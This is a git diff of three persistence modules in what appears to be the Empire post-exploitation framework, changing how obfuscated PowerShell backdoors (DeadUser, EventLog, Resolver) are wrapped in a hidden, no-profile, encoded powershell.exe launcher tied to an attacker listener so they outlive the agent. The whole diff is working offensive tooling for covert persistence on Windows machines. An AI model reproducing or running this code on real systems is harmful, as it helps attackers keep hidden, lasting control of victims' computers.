diff --git a/lib/modules/powershell/persistence/powerbreach/deaduser.py b/lib/modules/powershell/persistence/powerbreach/deaduser.py index 2072b6f..7c75df6 100644 --- a/lib/modules/powershell/persistence/powerbreach/deaduser.py +++ b/lib/modules/powershell/persistence/powerbreach/deaduser.py @@ -149,7 +149,7 @@ Invoke-DeadUserBackdoor""" else: # set the listener value for the launcher - stager = self.mainMenu.stagers.stagers["launcher"] + stager = self.mainMenu.stagers.stagers["multi/launcher"] stager.options['Listener']['Value'] = listenerName stager.options['Base64']['Value'] = "False" @@ -188,7 +188,8 @@ Invoke-DeadUserBackdoor""" script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) # transform the backdoor into something launched by powershell.exe # so it survives the agent exiting - launcher = helpers.powershell_launcher(script) + modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc " + launcher = helpers.powershell_launcher(script, modifiable_launcher) stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher parts = stagerCode.split(" ") diff --git a/lib/modules/powershell/persistence/powerbreach/eventlog.py b/lib/modules/powershell/persistence/powerbreach/eventlog.py index ee56f7f..5c552c5 100644 --- a/lib/modules/powershell/persistence/powerbreach/eventlog.py +++ b/lib/modules/powershell/persistence/powerbreach/eventlog.py @@ -123,7 +123,7 @@ Invoke-EventLogBackdoor""" else: # set the listener value for the launcher - stager = self.mainMenu.stagers.stagers["launcher"] + stager = self.mainMenu.stagers.stagers["multi/launcher"] stager.options['Listener']['Value'] = listenerName stager.options['Base64']['Value'] = "False" @@ -162,7 +162,8 @@ Invoke-EventLogBackdoor""" script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) # transform the backdoor into something launched by powershell.exe # so it survives the agent exiting - launcher = helpers.powershell_launcher(script) + modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc " + launcher = helpers.powershell_launcher(script, modifiable_launcher) stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher parts = stagerCode.split(" ") diff --git a/lib/modules/powershell/persistence/powerbreach/resolver.py b/lib/modules/powershell/persistence/powerbreach/resolver.py index 5ca8769..554a3cc 100644 --- a/lib/modules/powershell/persistence/powerbreach/resolver.py +++ b/lib/modules/powershell/persistence/powerbreach/resolver.py @@ -136,7 +136,7 @@ Invoke-ResolverBackdoor""" else: # set the listener value for the launcher - stager = self.mainMenu.stagers.stagers["launcher"] + stager = self.mainMenu.stagers.stagers["multi/launcher"] stager.options['Listener']['Value'] = listenerName stager.options['Base64']['Value'] = "False" @@ -175,7 +175,8 @@ Invoke-ResolverBackdoor""" script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) # transform the backdoor into something launched by powershell.exe # so it survives the agent exiting - launcher = helpers.powershell_launcher(script) + modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc " + launcher = helpers.powershell_launcher(script, modifiable_launcher) stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher parts = stagerCode.split(" ")